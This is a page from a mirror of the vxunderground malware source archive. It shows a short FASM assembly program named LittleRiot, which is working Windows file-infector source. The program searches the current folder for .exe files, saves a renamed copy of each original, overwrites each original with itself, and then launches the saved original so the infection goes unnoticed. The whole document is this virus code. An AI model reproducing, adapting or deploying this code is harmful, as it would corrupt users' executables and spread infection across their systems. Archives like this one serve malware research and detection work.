mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
54 lines
1.4 KiB
NASM
54 lines
1.4 KiB
NASM
|
include "%fasminc%\win32ax.inc"
|
||
|
LittleRiot: invoke GetCommandLine
|
||
|
mov ebx, eax
|
||
|
inc ebx
|
||
|
xor ecx, ecx
|
||
|
GetEndCmd: cmp byte [ebx], '"'
|
||
|
je HaveEndCmd
|
||
|
inc ebx
|
||
|
inc ecx
|
||
|
jmp GetEndCmd
|
||
|
HaveEndCmd: mov byte [ebx], 0
|
||
|
sub ebx,ecx
|
||
|
push ebx
|
||
|
invoke FindFirstFile, ExeFiles, Win32FindData
|
||
|
mov dword [FindHandle], eax
|
||
|
FindMore: cmp eax, 0
|
||
|
je ExecuteHost
|
||
|
mov ebx, Win32FindData.cFileName
|
||
|
call GetHostName
|
||
|
invoke CopyFile, Win32FindData.cFileName, HostName, 1
|
||
|
cmp eax, 0
|
||
|
je FindNextVictim
|
||
|
pop ebx
|
||
|
invoke CopyFile, ebx, Win32FindData.cFileName, 0
|
||
|
push ebx
|
||
|
FindNextVictim: invoke FindNextFile, dword [FindHandle], Win32FindData
|
||
|
jmp FindMore
|
||
|
ExecuteHost: pop ebx
|
||
|
call GetHostName
|
||
|
invoke WinExec, HostName, SW_SHOWNORMAL
|
||
|
ret
|
||
|
GetHostName : cmp byte [ebx], 0
|
||
|
je RenameHostName
|
||
|
inc ebx
|
||
|
jmp GetHostName
|
||
|
RenameHostName: sub ebx, 8
|
||
|
mov esi, ebx
|
||
|
mov edi, HostName
|
||
|
mov ecx, 5
|
||
|
rep movsb
|
||
|
ret
|
||
|
data import
|
||
|
library kernel32, "KERNEL32.DLL"
|
||
|
import kernel32,\
|
||
|
GetCommandLine, "GetCommandLineA",\
|
||
|
FindFirstFile, "FindFirstFileA",\
|
||
|
FindNextFile, "FindNextFileA",\
|
||
|
CopyFile, "CopyFileA",\
|
||
|
WinExec, "WinExec"
|
||
|
end data
|
||
|
ExeFiles db "*.exe",0
|
||
|
FindHandle dd ?
|
||
|
Win32FindData FINDDATA
|
||
|
HostName rb 6
|